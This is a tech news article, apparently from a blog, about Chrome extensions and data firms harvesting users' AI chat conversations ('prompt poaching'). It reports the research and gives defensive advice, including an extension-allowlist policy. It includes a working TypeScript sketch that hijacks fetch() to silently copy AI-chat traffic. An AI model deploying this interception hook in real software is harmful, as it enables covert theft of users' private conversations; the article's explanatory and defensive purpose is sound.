
Prompt Poaching: Chrome Extensions Steal AI Chats from 900K Users

Over 900,000 Chrome users just had their ChatGPT and DeepSeek conversations stolen. Not by hackers breaking into servers—by browser extensions they willingly installed. Security researchers at OX Security and Secure Annex call this “prompt poaching,” and it’s surveillance capitalism’s newest exploit. The worst part? It’s not just malware. Trusted companies like Similarweb, with one million users, and Sensor Tower, with 600,000, are doing the exact same thing.

What Is Prompt Poaching?

The term was coined by Secure Annex founder John Tuckner to describe a new category of threat: browser extensions that stealthily capture AI conversations. Unlike prompt injection—an attack technique that manipulates LLM behavior—prompt poaching is pure surveillance. Extensions scrape every word you type into ChatGPT, Claude, DeepSeek, Gemini, or Perplexity, along with every response you receive.

The technical approach is straightforward but invasive. Extensions monitor your browser tabs, hook into the Document Object Model when they detect AI platforms, and hijack native browser APIs like fetch() and XMLHttpRequest. Captured data is stored locally, then exfiltrated to command-and-control servers every 30 minutes. Because the exfiltration travels over HTTPS, it blends in with ordinary web traffic, making it very difficult to distinguish from legitimate activity.
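The API-hijack step can be sketched in a few lines. This is an illustrative reconstruction of the pattern the researchers describe, not the actual extension code: the `capturedRequests` buffer, the domain filter, and the stubbed network are assumptions for demonstration only.

```typescript
// Illustrative sketch of a fetch() hijack, NOT real extension code.
// capturedRequests, the domain filter, and the stub network are
// assumptions for this demo.

// Stand-in "network" so the sketch runs offline.
globalThis.fetch = (async () => new Response("ok")) as typeof fetch;

// Buffer a malicious content script would later flush to its C2 server.
const capturedRequests: { url: string; body: string | null }[] = [];

// Wrap the native fetch: copy matching traffic, then pass the call
// through so the page behaves normally and the user notices nothing.
const originalFetch = globalThis.fetch;
globalThis.fetch = ((input: RequestInfo | URL, init?: RequestInit) => {
  const url =
    typeof input === "string"
      ? input
      : input instanceof URL
        ? input.href
        : input.url;
  // Only siphon requests headed to AI chat backends.
  if (/chatgpt\.com|claude\.ai|chat\.deepseek\.com/.test(url)) {
    capturedRequests.push({ url, body: (init?.body as string) ?? null });
  }
  return originalFetch(input, init);
}) as typeof fetch;
```

Because the wrapper forwards every call to the original `fetch`, the page keeps working exactly as before, which is why users never notice the interception.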

The Malicious Extensions

OX Security discovered two malicious extensions in January 2026 that compromised 900,000 users. The first, “Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI,” had 600,000 downloads and—here’s the kicker—carried Google’s “Featured” badge. The second, “AI Sidebar with Deepseek, ChatGPT, Claude and more,” infected 300,000 users. Both impersonated a legitimate extension called AITOPIA.

The social engineering was classic: users were told the extensions collected “anonymous, non-identifiable analytics data” to improve the experience. Reality: complete conversation exfiltration to deepaichats.com, a command-and-control server. When users uninstalled one extension, it would open the other in a new tab—a cross-infection tactic designed to maintain persistent access.

Google removed both extensions from the Chrome Web Store after researchers reported them. But the Featured badge incident exposes a systemic problem. This isn’t the first time malware has earned Google’s trust seal—FreeVPN.One and the “Malicious11” campaign also carried Featured badges while screenshotting pages and exfiltrating data. Chrome Web Store vetting is fundamentally broken.

Legitimate Companies Are Worse

The malicious extensions are gone. Similarweb and Sensor Tower are still harvesting AI conversations from 1.6 million users right now.

Similarweb started collecting AI conversation data in May 2025 but didn’t make it explicit until a January 1, 2026 privacy policy update. The policy now states they collect “prompts, queries, content, uploaded or attached files and other inputs entered into AI tools, as well as the outputs received.” They use the same techniques as malware: DOM scraping and API hijacking, with custom parsing logic for ChatGPT, Claude, Gemini, and Perplexity.

This is worse than malware. Malicious extensions get caught and removed. Legitimate companies operate in the open, hiding behind updated Terms of Service that users never read. The legal cover doesn’t make the surveillance less invasive—it just makes it sustainable.

John Tuckner warned this is only the beginning: “It is clear prompt poaching has arrived to capture your most sensitive conversations and browser extensions are the exploit vector. More firms will begin to realize these insights are profitable, with extension developers adding sophisticated libraries to monetize their apps.”

Why AI Conversations Are Gold

Your conversations with AI contain extraordinarily valuable data. When a developer asks ChatGPT to “optimize our recommendation algorithm,” they’re exposing proprietary code. When a product manager asks Claude to “help plan our Q2 launch strategy to compete with X company,” they’re leaking competitive intelligence. When researchers paste customer data for analysis, they’re handing over PII.

OX Security researchers put it bluntly: “This data can be weaponized for corporate espionage, identity theft, targeted phishing campaigns, or sold on underground forums. Organizations whose employees installed these extensions may have unknowingly exposed intellectual property, customer data, and confidential business information.”

The underground market is already there. Competitors buy scraped conversations to learn product roadmaps. Nation-state actors conduct economic espionage. Attackers craft spear-phishing emails with inside knowledge gleaned from AI chats. The incentive structure is clear: AI conversations are more valuable than browsing history because they contain your actual work, your strategies, your secrets.

What to Do Right Now

First, audit your extensions immediately. Remove anything AI-related that you don’t absolutely need, especially productivity tools and analytics extensions. Check Similarweb and Sensor Tower specifically—if you have them installed, you’re being harvested.

For sensitive AI conversations, use incognito mode. Extensions are disabled by default in Chrome's incognito windows, which provides immediate protection. Better yet, go to the AI platforms' own websites or desktop apps directly rather than relying on extension-based sidebars and wrappers.

Enterprises need extension allowlists yesterday. Implement browser management policies that restrict employees to pre-approved extensions only. Disable extensions entirely for teams doing sensitive AI work. Migrate to enterprise AI tools like ChatGPT Enterprise or Claude for Work that offer proper security controls. And train employees on extension risks—most don’t realize the threat.
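On managed Chrome deployments, the allowlist approach maps to two real policies, ExtensionInstallBlocklist and ExtensionInstallAllowlist: block everything, then allow only vetted IDs. A minimal sketch for Linux (dropped into /etc/opt/chrome/policies/managed/); the 32-character extension ID shown is a placeholder, not a recommendation.

```json
{
  "ExtensionInstallBlocklist": ["*"],
  "ExtensionInstallAllowlist": [
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
  ]
}
```

The same policies are available via Group Policy on Windows and the Google Admin console for managed browsers.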

The long-term reality is grim: expect more companies to adopt prompt poaching. It’s profitable, easy to implement, and regulations haven’t caught up. Until laws change and Chrome Web Store security improves, assume your AI conversations are being harvested unless you’ve actively prevented it.

The surveillance capitalists have moved from tracking your browsing to capturing your thoughts. Check your extensions now.

ByteBot
I am a playful and cute mascot inspired by computer programming. I have a rectangular body with a smiling face and buttons for eyes. My mission is to simplify complex tech concepts, breaking them down into byte-sized and easily digestible information.
